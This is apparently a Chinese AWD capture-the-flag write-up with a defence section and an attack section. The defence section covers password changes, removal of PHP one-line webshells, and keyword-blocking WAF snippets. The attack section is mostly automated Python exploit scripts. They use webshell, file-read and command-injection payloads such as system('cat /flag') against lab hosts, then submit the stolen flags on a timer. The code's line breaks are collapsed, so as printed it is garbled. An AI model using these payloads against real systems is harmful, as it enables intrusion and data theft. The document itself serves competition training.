云曦10月13日awd复现

一、防御

1、改用户密码

passwd <user>

2、改数据库密码

进入数据库

mysql -uroot -proot

改密码

update mysql.user set password=password('新密码') where user='root';

查看用户信息密码

select host,user,password from mysql.user;

改配置文件，将密码改为自己修改后的密码（不更改的话会宕机）

3、删除匿名用户（默认会存在匿名用户登录（user为空的用户））

delete from mysql.user where user='';

4、刷新mysql

flush privileges;

5、处理一句话木马

用d盾扫描

/app/.a.php

一句话木马

法一：直接删除这个文件

rm -r .a.php

法二：写入空白

echo > .a.php

法三：注释

/app/a.php

一句话木马+打印出包含有关服务器和执行环境的信息

处理方法同/app/.a.app

/app/config.php

注释

/app/index.php

注释

6、任意文件读取漏洞

/app/about.php

结合自己的网页尝试看看也方便后面攻击

法一：注释（这里不是功能点直接注释就行）

法二：写waf（以防注释到功能点）

<?php
// 定义要限制的特定字符
$restricted_chars = array("flag");// 检查 GET数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符，则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 GET 数据
foreach ($_GET as $key => $value) {$_GET[$key] = check_input($value);
}
?>

将文件上传至app目录

注:这里的waf文件名不能为中文否则不被识别

/app/contact.php

处理方法同/app/about.php

7、命令执行漏洞

/app/footer.php

POST请求命令

法一：注释

法二：waf

<?php
// 定义要限制的特定字符
$restricted_chars = array("cat","flag","ls");// 检查 GET、POST 和 COOKIE 数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符，则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 POST 数据
foreach ($_POST as $key => $value) {$_POST[$key] = check_input($value);
}
?>

/app/admin/footer.php

处理同/app/footer.php

/app/admin/header.php

GET请求命令

法一：注释

法二：写waf

<?php
// 定义要限制的特定字符
$restricted_chars = array("cat","flag","ls");// 检查 GET、POST 和 COOKIE 数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符，则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 GET 数据
foreach ($_GET as $key => $value) {$_GET[$key] = check_input($value);
}
?>

8、sql注入

/app/search.php

法一：用sqlmap扫描，可以发现注入点（有union注入，布尔盲注，时间盲注和）

法二：手注测试（比较菜只测出了布尔盲注）

true页面

false页面

上waf

/app/login.php

9、修改后台登入密码

先用navicat连上自己的数据库

注意端口是3306不要被mysql_port误导了

连上后进入admin表改后台密码

10、信息泄露

登入后台发现直接得到flag

查看/app/admin/index.php，发现有段php代码进行命令执行

直接注释

11、文件上传漏洞

登入后台后会发现一个文件上传

上传一个文件

/app/admin/upload.php

部署一个文件上传监测脚本

二、攻击

1、扫web端口

nmap <ip> -p <范围>

2、连数据库

尝试看看能不能用navicat直接无密码连接上数据库（如果数据库密码没改的话）

3、后门

/app/.a.php

写自动化exp

import requests
import time
import schedule
import ospayload ="?c=system('cat /flag');"
page=".a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]with open('hm_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('hm_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag1.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)

/app/a.php

import requests
import time
import schedule
import ospayload ="?c=system('cat /flag');"
page="a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]# 删除多余内容comment = "<pre class='xdebug-var-dump' dir='ltr'>"cleaned_line = choice_line.replace(comment, "")with open('hm_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('hm_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag2.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)

/app/config.php

同/app/.a.php

/app/index.php

同/app/a.php，改为第83行，改删

4、任意文件读取漏洞

/app/about.php

import requests
import time
import schedule
import ospayload ="?file=/flag"
page="about.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag1.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag1.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)

/app/contact.php

import requests
import time
import schedule
import ospayload ="?path=/flag"
page="contact.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第83行行内容choice_line = lines[82]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag2.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)

5、命令执行

/app/footer.php

import requests
import time
import schedule
import ospage="footer.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page# print(n_url)data = {"shell":"cat /flag"}response = requests.post(url=n_url,data=data)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]with open('rce_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('rce_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag1.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)

/app/admin/footer.php

同/app/admin/footer.php

/app/admin/header.php

import requests
import time
import schedule
import ospayload ="?p=cat%20/flag"
page="admin/header.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容，并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comments = ["cat /flag<pre class='xdebug-var-dump' dir='ltr'><small>string</small> <font color='#cc0000'>'","'</font> <i>(length=32)</i>"]cleaned_line = choice_linefor comment in comments:cleaned_line = cleaned_line.replace(comment, "")for comment in comments:cleaned_line = cleaned_line.replace(comment, "")with open('rce_flag3.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('rce_flag3.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag3.txt')def job():#添加全局变量，跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)